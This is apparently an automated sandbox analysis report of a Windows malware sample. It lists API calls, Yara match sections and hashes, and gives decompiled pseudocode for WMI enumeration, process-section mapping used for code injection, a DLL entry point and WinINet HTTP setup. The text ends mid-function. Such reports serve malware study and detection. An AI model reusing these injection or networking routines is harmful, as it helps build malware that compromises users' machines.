                                    • GetCurrentProcess.KERNEL32 ref: 0008D09F
                                    • GetLastError.KERNEL32 ref: 0008D13E
                                    • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                                    • GetLastError.KERNEL32 ref: 0008D172
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                                    • GetCurrentProcess.KERNEL32 ref: 0008D20E
                                    • memset.MSVCRT ref: 0008D229
                                    • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                                    • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                                    • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                                    • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                                    • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                    • API String ID: 3876402152-2706916422
                                    • Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                                    • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                                    • Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                                    • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				void* _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				intOrPtr _v40;
                                    				signed int _v44;
                                    				char _v48;
                                    				char _v52;
                                    				intOrPtr _v56;
                                    				signed int _v60;
                                    				char* _v72;
                                    				signed short _v80;
                                    				signed int _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				intOrPtr _v100;
                                    				char _v104;
                                    				char _v616;
                                    				intOrPtr* _t159;
                                    				char _t165;
                                    				signed int _t166;
                                    				signed int _t173;
                                    				signed int _t178;
                                    				signed int _t186;
                                    				intOrPtr* _t187;
                                    				signed int _t188;
                                    				signed int _t192;
                                    				intOrPtr* _t193;
                                    				intOrPtr _t200;
                                    				intOrPtr* _t205;
                                    				signed int _t207;
                                    				signed int _t209;
                                    				intOrPtr* _t210;
                                    				intOrPtr _t212;
                                    				intOrPtr* _t213;
                                    				signed int _t214;
                                    				char _t217;
                                    				signed int _t218;
                                    				signed int _t219;
                                    				signed int _t230;
                                    				signed int _t235;
                                    				signed int _t242;
                                    				signed int _t243;
                                    				signed int _t244;
                                    				signed int _t245;
                                    				intOrPtr* _t247;
                                    				intOrPtr* _t251;
                                    				signed int _t252;
                                    				intOrPtr* _t253;
                                    				void* _t255;
                                    				intOrPtr* _t261;
                                    				signed int _t262;
                                    				signed int _t283;
                                    				signed int _t289;
                                    				char* _t298;
                                    				void* _t320;
                                    				signed int _t322;
                                    				intOrPtr* _t323;
                                    				intOrPtr _t324;
                                    				signed int _t327;
                                    				intOrPtr* _t328;
                                    				intOrPtr* _t329;
                                    
                                    				_v32 = _v32 & 0x00000000;
                                    				_v60 = _v60 & 0x00000000;
                                    				_v56 = __edx;
                                    				_v100 = __ecx;
                                    				_t159 = E0008D523(__ecx);
                                    				_t251 = _t159;
                                    				_v104 = _t251;
                                    				if(_t251 == 0) {
                                    					return _t159;
                                    				}
                                    				_t320 = E00088604(0x10);
                                    				_v36 = _t320;
                                    				_pop(_t255);
                                    				if(_t320 == 0) {
                                    					L53:
                                    					E0008861A( &_v60, 0xfffffffe);
                                    					E0008D5D7( &_v104);
                                    					return _t320;
                                    				}
                                    				_t165 = E000895E1(_t255, 0x536);
                                    				 *_t328 = 0x609;
                                    				_v52 = _t165;
                                    				_t166 = E000895E1(_t255);
                                    				_push(0);
                                    				_push(_v56);
                                    				_v20 = _t166;
                                    				_push(_t166);
                                    				_push(_a4);
                                    				_t322 = E000892E5(_t165);
                                    				_v60 = _t322;
                                    				E000885D5( &_v52);
                                    				E000885D5( &_v20);
                                    				_t329 = _t328 + 0x20;
                                    				if(_t322 != 0) {
                                    					_t323 = __imp__#2;
                                    					_v40 =  *_t323(_t322);
                                    					_t173 = E000895E1(_t255, 0x9e4);
                                    					_v20 = _t173;
                                    					_v52 =  *_t323(_t173);
                                    					E000885D5( &_v20);
                                    					_t324 = _v40;
                                    					_t261 =  *_t251;
                                    					_t252 = 0;
                                    					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                    					__eflags = _t178;
                                    					if(_t178 != 0) {
                                    						L52:
                                    						__imp__#6(_t324);
                                    						__imp__#6(_v52);
                                    						goto L53;
                                    					}
                                    					_t262 = _v32;
                                    					_v28 = 0;
                                    					_v20 = 0;
                                    					__eflags = _t262;
                                    					if(_t262 == 0) {
                                    						L49:
                                    						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                    						__eflags = _t252;
                                    						if(_t252 == 0) {
                                    							E0008861A( &_v36, 0);
                                    							_t320 = _v36;
                                    						} else {
                                    							 *(_t320 + 8) = _t252;
                                    							 *_t320 = E000891E3(_v100);
                                    							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
                                    						}
                                    						goto L52;
                                    					} else {
                                    						goto L6;
                                    					}
                                    					while(1) {
                                    						L6:
                                    						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                    						__eflags = _t186;
                                    						if(_t186 != 0) {
                                    							break;
                                    						}
                                    						_v16 = 0;
                                    						_v48 = 0;
                                    						_v12 = 0;
                                    						_v24 = 0;
                                    						__eflags = _v84;
                                    						if(_v84 == 0) {
                                    							break;
                                    						}
                                    						_t187 = _v28;
                                    						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                    						__eflags = _t188;
                                    						if(_t188 >= 0) {
                                    							__imp__#20(_v24, 1,  &_v16);
                                    							__imp__#19(_v24, 1,  &_v48);
                                    							_t46 = _t320 + 0xc; // 0xc
                                    							_t253 = _t46;
                                    							_t327 = _t252 << 3;
                                    							_t47 = _t327 + 8; // 0x8
                                    							_t192 = E00088698(_t327, _t47);
                                    							__eflags = _t192;
                                    							if(_t192 == 0) {
                                    								__imp__#16(_v24);
                                    								_t193 = _v28;
                                    								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                    								L46:
                                    								_t252 = _v20;
                                    								break;
                                    							}
                                    							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                    							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
                                    							_t200 =  *_t253;
                                    							__eflags =  *(_t327 + _t200 + 4);
                                    							if( *(_t327 + _t200 + 4) == 0) {
                                    								_t136 = _t320 + 0xc; // 0xc
                                    								E0008861A(_t136, 0);
                                    								E0008861A( &_v36, 0);
                                    								__imp__#16(_v24);
                                    								_t205 = _v28;
                                    								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                    								_t320 = _v36;
                                    								goto L46;
                                    							}
                                    							_t207 = _v16;
                                    							while(1) {
                                    								_v12 = _t207;
                                    								__eflags = _t207 - _v48;
                                    								if(_t207 > _v48) {
                                    									break;
                                    								}
                                    								_v44 = _v44 & 0x00000000;
                                    								_t209 =  &_v12;
                                    								__imp__#25(_v24, _t209,  &_v44);
                                    								__eflags = _t209;
                                    								if(_t209 < 0) {
                                    									break;
                                    								}
                                    								_t212 = E000891E3(_v44);
                                    								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                    								_t213 = _v28;
                                    								_t281 =  *_t213;
                                    								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                    								__eflags = _t214;
                                    								if(_t214 < 0) {
                                    									L39:
                                    									__imp__#6(_v44);
                                    									_t207 = _v12 + 1;
                                    									__eflags = _t207;
                                    									continue;
                                    								}
                                    								_v92 = E000895E1(_t281, 0x250);
                                    								 *_t329 = 0x4cc;
                                    								_t217 = E000895E1(_t281);
                                    								_t283 = _v80;
                                    								_v96 = _t217;
                                    								_t218 = _t283 & 0x0000ffff;
                                    								__eflags = _t218 - 0xb;
                                    								if(__eflags > 0) {
                                    									_t219 = _t218 - 0x10;
                                    									__eflags = _t219;
                                    									if(_t219 == 0) {
                                    										L35:
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                                    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                    										__eflags = _t289;
                                    										if(_t289 == 0) {
                                    											L38:
                                    											E000885D5( &_v92);
                                    											E000885D5( &_v96);
                                    											__imp__#9( &_v80);
                                    											goto L39;
                                    										}
                                    										_push(_v72);
                                    										_push(L"%d");
                                    										L37:
                                    										_push(0xc);
                                    										_push(_t289);
                                    										E00089640();
                                    										_t329 = _t329 + 0x10;
                                    										goto L38;
                                    									}
                                    									_t230 = _t219 - 1;
                                    									__eflags = _t230;
                                    									if(_t230 == 0) {
                                    										L33:
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                                    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                    										__eflags = _t289;
                                    										if(_t289 == 0) {
                                    											goto L38;
                                    										}
                                    										_push(_v72);
                                    										_push(L"%u");
                                    										goto L37;
                                    									}
                                    									_t235 = _t230 - 1;
                                    									__eflags = _t235;
                                    									if(_t235 == 0) {
                                    										goto L33;
                                    									}
                                    									__eflags = _t235 == 1;
                                    									if(_t235 == 1) {
                                    										goto L33;
                                    									}
                                    									L28:
                                    									__eflags = _t283 & 0x00002000;
                                    									if((_t283 & 0x00002000) == 0) {
                                    										_v88 = E000895E1(_t283, 0x219);
                                    										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                    										E000885D5( &_v88);
                                    										_t329 = _t329 + 0x18;
                                    										_t298 =  &_v616;
                                    										L31:
                                    										_t242 = E000891E3(_t298);
                                    										L32:
                                    										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                    										goto L38;
                                    									}
                                    									_t242 = E0008DA20( &_v80);
                                    									goto L32;
                                    								}
                                    								if(__eflags == 0) {
                                    									__eflags = _v72 - 0xffff;
                                    									_t298 = L"TRUE";
                                    									if(_v72 != 0xffff) {
                                    										_t298 = L"FALSE";
                                    									}
                                    									goto L31;
                                    								}
                                    								_t243 = _t218 - 1;
                                    								__eflags = _t243;
                                    								if(_t243 == 0) {
                                    									goto L38;
                                    								}
                                    								_t244 = _t243 - 1;
                                    								__eflags = _t244;
                                    								if(_t244 == 0) {
                                    									goto L35;
                                    								}
                                    								_t245 = _t244 - 1;
                                    								__eflags = _t245;
                                    								if(_t245 == 0) {
                                    									goto L35;
                                    								}
                                    								__eflags = _t245 != 5;
                                    								if(_t245 != 5) {
                                    									goto L28;
                                    								}
                                    								_t298 = _v72;
                                    								goto L31;
                                    							}
                                    							__imp__#16(_v24);
                                    							_t210 = _v28;
                                    							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                    							_t252 = _v20;
                                    							L42:
                                    							_t262 = _v32;
                                    							_t252 = _t252 + 1;
                                    							_v20 = _t252;
                                    							__eflags = _t262;
                                    							if(_t262 != 0) {
                                    								continue;
                                    							}
                                    							L48:
                                    							_t324 = _v40;
                                    							goto L49;
                                    						}
                                    						_t247 = _v28;
                                    						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                    						goto L42;
                                    					}
                                    					_t262 = _v32;
                                    					goto L48;
                                    				} else {
                                    					E0008861A( &_v36, _t322);
                                    					_t320 = _v36;
                                    					goto L53;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                                      • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                                      • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                                      • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                                      • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                                    • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                                    • SysFreeString.OLEAUT32(?), ref: 0008DF82
                                    • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                                      • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                    • String ID: FALSE$TRUE
                                    • API String ID: 1290676130-1412513891
                                    • Opcode ID: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                                    • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                                    • Opcode Fuzzy Hash: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                                    • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
                                    				signed int _v8;
                                    				char _v12;
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				struct HINSTANCE__* _v40;
                                    				char _v44;
                                    				char _v56;
                                    				char _v72;
                                    				struct _WNDCLASSEXA _v120;
                                    				intOrPtr _t69;
                                    				intOrPtr _t71;
                                    				intOrPtr _t75;
                                    				intOrPtr _t80;
                                    				intOrPtr _t92;
                                    				intOrPtr _t95;
                                    				intOrPtr _t96;
                                    				struct HWND__* _t106;
                                    				intOrPtr* _t113;
                                    				struct HINSTANCE__* _t116;
                                    				intOrPtr _t120;
                                    				intOrPtr _t126;
                                    				intOrPtr _t131;
                                    				intOrPtr _t134;
                                    				intOrPtr _t136;
                                    				intOrPtr _t139;
                                    				char _t140;
                                    				intOrPtr _t141;
                                    
                                    				_t69 =  *0x9e688; // 0xf0000
                                    				_t126 = __ecx;
                                    				_t134 = __edx;
                                    				_t116 = 0;
                                    				_v36 = __edx;
                                    				_v16 = 0;
                                    				_v44 = 0;
                                    				_v40 = 0;
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				_v24 = 0;
                                    				_v20 = __ecx;
                                    				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                    					E0008E23E(0x1f4);
                                    					_t116 = 0;
                                    				}
                                    				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                    				_v28 = _t116;
                                    				if( *_t113 != 0x4550) {
                                    					L12:
                                    					if(_v8 != 0) {
                                    						_t75 =  *0x9e780; // 0x0
                                    						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                    						_v8 = _v8 & 0x00000000;
                                    					}
                                    					L14:
                                    					if(_v12 != 0) {
                                    						_t136 =  *0x9e780; // 0x0
                                    						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                                    					}
                                    					if(_v16 != 0) {
                                    						_t71 =  *0x9e780; // 0x0
                                    						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                                    					}
                                    					return _v8;
                                    				}
                                    				_push(_t116);
                                    				_push(0x8000000);
                                    				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                    				_push(0x40);
                                    				_push( &_v44);
                                    				_push(_t116);
                                    				_push(0xe);
                                    				_push( &_v16);
                                    				_t80 =  *0x9e780; // 0x0
                                    				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                                    					goto L12;
                                    				}
                                    				_v120.style = 0xb;
                                    				_v120.cbSize = 0x30;
                                    				_v120.lpszClassName =  &_v56;
                                    				asm("movsd");
                                    				_v120.lpfnWndProc = DefWindowProcA;
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsb");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsw");
                                    				asm("movsb");
                                    				_v120.cbWndExtra = 0;
                                    				_v120.lpszMenuName = 0;
                                    				_v120.cbClsExtra = 0;
                                    				_v120.hInstance = 0;
                                    				if(RegisterClassExA( &_v120) != 0) {
                                    					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                                    					if(_t106 != 0) {
                                    						DestroyWindow(_t106);
                                    						UnregisterClassA( &_v56, 0);
                                    					}
                                    				}
                                    				_t139 =  *0x9e780; // 0x0
                                    				_push(0x40);
                                    				_push(0);
                                    				_push(2);
                                    				_push( &_v24);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push( &_v12);
                                    				_push(GetCurrentProcess());
                                    				_push(_v16);
                                    				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                                    					_t126 = _v20;
                                    					goto L12;
                                    				} else {
                                    					_push(0x40);
                                    					_push(0);
                                    					_push(2);
                                    					_push( &_v24);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_t126 = _v20;
                                    					_push( &_v8);
                                    					_t92 =  *0x9e780; // 0x0
                                    					_push(_t126);
                                    					_push(_v16);
                                    					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                                    						goto L12;
                                    					}
                                    					_t140 = E00088669( *0x9e688, 0x1ac4);
                                    					_v32 = _t140;
                                    					if(_t140 == 0) {
                                    						goto L12;
                                    					}
                                    					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                    					_t95 =  *0x9e684; // 0x12af8f0
                                    					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                                    					_t120 =  *0x9e684; // 0x12af8f0
                                    					_t131 = _t96;
                                    					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                    					E0008861A( &_v32, 0x1ac4);
                                    					_t141 =  *0x9e688; // 0xf0000
                                    					 *0x9e688 = _t131;
                                    					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                    					E0008C63F(_v12, _v8, _v36);
                                    					 *0x9e688 = _t141;
                                    					goto L14;
                                    				}
                                    			}

                                    APIs
                                    • RegisterClassExA.USER32 ref: 0008C785
                                    • CreateWindowExA.USER32 ref: 0008C7B0
                                    • DestroyWindow.USER32 ref: 0008C7BB
                                    • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                                      • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                                    • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                    • API String ID: 3082384575-2319545179
                                    • Opcode ID: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
                                    • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                                    • Opcode Fuzzy Hash: 8bb081a5582da799488192e2f74a1ae18185b5fa3b829c330fd2e48e9cfd5350
                                    • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                                    				char _v8;
                                    				char _v16;
                                    				short _v144;
                                    				short _v664;
                                    				void* _t19;
                                    				struct HINSTANCE__* _t22;
                                    				long _t23;
                                    				long _t24;
                                    				char* _t27;
                                    				WCHAR* _t32;
                                    				long _t33;
                                    				intOrPtr _t37;
                                    				intOrPtr _t38;
                                    				void* _t49;
                                    				int _t53;
                                    				void* _t54;
                                    				intOrPtr* _t55;
                                    				void* _t57;
                                    
                                    				_t49 = __edx;
                                    				OutputDebugStringA("Hello qqq");
                                    				if(_a8 != 1) {
                                    					if(_a8 != 0) {
                                    						L12:
                                    						return 1;
                                    					}
                                    					SetLastError(0xaa);
                                    					L10:
                                    					return 0;
                                    				}
                                    				E000885EF();
                                    				_t19 = E0008980C( &_v16);
                                    				_t57 = _t49;
                                    				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                                    					goto L12;
                                    				} else {
                                    					E00088F78();
                                    					GetModuleHandleA(0);
                                    					_t22 = _a4;
                                    					 *0x9e69c = _t22;
                                    					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                    					_t24 = GetLastError();
                                    					if(_t23 != 0 && _t24 != 0x7a) {
                                    						memset( &_v144, 0, 0x80);
                                    						_t55 = _t54 + 0xc;
                                    						_t53 = 0;
                                    						do {
                                    							_t27 = E000895C7(_t53);
                                    							_a8 = _t27;
                                    							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                    							E000885C2( &_a8);
                                    							_t53 = _t53 + 1;
                                    						} while (_t53 < 0x2710);
                                    						E00092A5B( *0x9e69c);
                                    						 *_t55 = 0x7c3;
                                    						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
                                    						 *_t55 = 0xb4e;
                                    						_t32 = E000895E1(0x9ba28);
                                    						_a8 = _t32;
                                    						_t33 = GetFileAttributesW(_t32);
                                    						_push( &_a8);
                                    						if(_t33 == 0xffffffff) {
                                    							E000885D5();
                                    							_v8 = 0;
                                    							_t37 =  *0x9e684; // 0x12af8f0
                                    							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
                                    							 *0x9e6a8 = _t38;
                                    							if(_t38 == 0) {
                                    								goto L10;
                                    							}
                                    							goto L12;
                                    						}
                                    						E000885D5();
                                    					}
                                    					goto L10;
                                    				}
                                    			}






















                                    APIs
                                    • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                                    • SetLastError.KERNEL32(000000AA), ref: 000860D7
                                      • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                                      • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                                      • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                                    • GetLastError.KERNEL32 ref: 00085FEF
                                    • memset.MSVCRT ref: 00086013
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                    • String ID: Hello qqq
                                    • API String ID: 1203100507-3610097158
                                    • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                                    • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                                    • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                                    • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                    				char _v8;
                                    				char _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				int _v76;
                                    				void* _v80;
                                    				intOrPtr _v100;
                                    				int _v104;
                                    				void* _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				char* _v120;
                                    				void _v124;
                                    				char _v140;
                                    				void _v396;
                                    				void _v652;
                                    				intOrPtr _t105;
                                    				intOrPtr _t113;
                                    				intOrPtr* _t115;
                                    				intOrPtr _t118;
                                    				intOrPtr _t121;
                                    				intOrPtr _t124;
                                    				intOrPtr _t127;
                                    				intOrPtr _t131;
                                    				char _t133;
                                    				intOrPtr _t136;
                                    				char _t138;
                                    				char _t139;
                                    				intOrPtr _t141;
                                    				intOrPtr _t147;
                                    				intOrPtr _t154;
                                    				intOrPtr _t158;
                                    				intOrPtr _t162;
                                    				intOrPtr _t164;
                                    				intOrPtr _t166;
                                    				intOrPtr _t172;
                                    				intOrPtr _t176;
                                    				void* _t183;
                                    				void* _t185;
                                    				intOrPtr _t186;
                                    				char _t195;
                                    				intOrPtr _t203;
                                    				intOrPtr _t204;
                                    				signed int _t209;
                                    				void _t212;
                                    				intOrPtr _t213;
                                    				void* _t214;
                                    				intOrPtr _t216;
                                    				char _t217;
                                    				intOrPtr _t218;
                                    				signed int _t219;
                                    				signed int _t220;
                                    				void* _t221;
                                    
                                    				_v40 = _v40 & 0x00000000;
                                    				_v24 = 4;
                                    				_v36 = 1;
                                    				_t214 = __edx;
                                    				memset( &_v396, 0, 0x100);
                                    				memset( &_v652, 0, 0x100);
                                    				_v64 = E000895C7(0x85b);
                                    				_v60 = E000895C7(0xdc9);
                                    				_v56 = E000895C7(0x65d);
                                    				_v52 = E000895C7(0xdd3);
                                    				_t105 = E000895C7(0xb74);
                                    				_v44 = _v44 & 0;
                                    				_t212 = 0x3c;
                                    				_v48 = _t105;
                                    				memset( &_v124, 0, 0x100);
                                    				_v116 = 0x10;
                                    				_v120 =  &_v140;
                                    				_v124 = _t212;
                                    				_v108 =  &_v396;
                                    				_v104 = 0x100;
                                    				_v80 =  &_v652;
                                    				_push( &_v124);
                                    				_push(0);
                                    				_v76 = 0x100;
                                    				_push(E0008C379(_t214));
                                    				_t113 =  *0x9e6a4; // 0x1400810
                                    				_push(_t214);
                                    				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                    					_t209 = 0;
                                    					_v20 = 0;
                                    					do {
                                    						_t115 =  *0x9e6a4; // 0x1400810
                                    						_v12 = 0x8404f700;
                                    						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                    						if(_t213 != 0) {
                                    							_t195 = 3;
                                    							_t185 = 4;
                                    							_v8 = _t195;
                                    							_t118 =  *0x9e6a4; // 0x1400810
                                    							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                    							_v8 = 0x3a98;
                                    							_t121 =  *0x9e6a4; // 0x1400810
                                    							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                    							_v8 = 0x493e0;
                                    							_t124 =  *0x9e6a4; // 0x1400810
                                    							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                    							_v8 = 0x493e0;
                                    							_t127 =  *0x9e6a4; // 0x1400810
                                    							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                    							_t131 =  *0x9e6a4; // 0x1400810
                                    							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                    							if(_a24 != 0) {
                                    								E0008980C(_a24);
                                    							}
                                    							if(_t186 != 0) {
                                    								_t133 = 0x8484f700;
                                    								if(_v112 != 4) {
                                    									_t133 = _v12;
                                    								}
                                    								_t136 =  *0x9e6a4; // 0x1400810
